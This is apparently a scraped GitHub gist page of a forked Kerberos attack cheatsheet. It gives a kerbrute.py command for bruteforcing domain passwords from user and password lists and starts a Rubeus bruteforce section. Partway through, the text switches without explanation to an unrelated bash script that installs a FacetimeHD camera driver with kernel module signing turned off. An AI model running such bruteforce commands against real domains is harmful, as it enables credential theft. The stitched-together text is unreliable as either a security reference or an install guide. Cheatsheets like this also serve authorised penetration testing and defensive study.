Skip to content

Instantly share code, notes, and snippets.

View victorgrudtnerboell's full-sized avatar

Victor Grudtner Boell victorgrudtnerboell

View GitHub Profile
@victorgrudtnerboell
victorgrudtnerboell / kerberos_attacks_cheatsheet.md
Created January 10, 2021 01:02 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

#!/bin/bash
set -e
export CONFIG_MODULE_SIG=n
export CONFIG_MODULE_SIG_ALL=n
# For current kernel
export KERNELRELEASE=$(cat /proc/version | awk '{print $3}')
temp_dir=$(mktemp -d)
echo "Installing FacetimeHD camera for $KERNELRELEASE"